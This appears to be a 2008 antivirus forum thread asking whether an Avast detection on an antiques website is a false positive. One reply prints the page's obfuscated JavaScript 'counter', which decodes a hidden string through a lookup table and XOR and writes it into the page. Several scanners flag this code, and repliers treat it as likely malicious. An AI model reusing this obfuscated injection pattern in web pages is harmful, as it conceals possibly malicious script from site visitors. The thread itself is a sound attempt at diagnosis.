Believed False Positive: Malware-Gen

My Avast On-Access reports “VBS:Malware-gen” as detected on the following web page:

hhtp://www.writeantiques.com/bumblebee-puts-sting-into-crime-fighting/
(Change the obvious at the beginning; I didn’t want a working link just in case the page really does house an infection!))

AVG does not report any issues with the site; nor does Trend OfficeScan. I therefore suspect it to be a false positive by Avast.

Avast version 4.8 Home Edition
Builld: Jul2008(4.8.1229)
VPS Version: 080925-0, 25/09/2008

Regards,
Jon.

Bad for them… the site is infected…

It does look like a good detection, see http://www.virustotal.com/analisis/cc5438fdec1a81e18d436108ed4d7167.

I had a quick look at the code on the page and I think that this might be what is having avast and the other AVs getting anxious about. And the code in after the “document.write” bit in particular I believe this might just be for a page counter but it does a lot to hide what it is doing.


<!-- start counter :rkgi58s:wpnjs --><script language=JavaScript>function 
dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,43,20,57,12,11,8,46,29,16,0,0,0,0,0,0,27,62,
19,4,9,26,58,60,59,31,22,23,48,36,55,34,25,56,28,1,21,10,32,38,49,47,3,0,0,0,0,39,0,14,61,
52,13,30,50,18,42,44,54,0,51,35,45,2,15,33,24,7,5,40,6,41,53,37,17);for(j=Math.ceil(l/b);j>0;j--)
{r="";for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s)
{r+=String.fromCharCode(165^w&255);w>>=8;
s-=2}else{s=6}}document.write(r)}}dc("PEnXKlRxzKuxK@4WojRczKb_UhQx9ePlU@8c5hGxo1uxzBR
cUU8x5YQlJ5rqzl8xkmwVzZRNz1QlCpdXJ@Gx4K8co7PWUEnXKlRxzYDhYo")</script>

David, thanks for putting in the time to look at this query :wink:

So, your analysis is that the page does not actually contain a virus or malware?


Some page counters are not just page counters.


Install a HOSTS file to prevent page counters from counting.

HOSTS files I use:
http://www.mvps.org/winhelp2002/hosts.htm
http://hosts-file.net/?s=Download

Managed with HostsMan and I use its HostsServer proxy to speed up browsing:
http://www.abelhadigital.com

You’re welcome.

No, what I’m saying is really why is it going to the trouble of obfuscating the code, it is this which might be why avast and 8 other scanners are alerting on it (including GData with avast as it also uses avast as one of its scanners to make 9 detections in total).

It needs further analysis by avast (I have sent a sample) as it is beyond my limited knowledge, being able to suspect why it might be detected is less than knowing exactly what the code is doing.

So I would air on the side of safety (along with the multiple detections) and wouldn’t visit that site.

@ YoKenny
I don’t know if a hosts file would prevent this type of obfuscated code (assuming it is indeed a page hit counter) as it wouldn’t have a clearly defined domain name to work with.

I would post the same…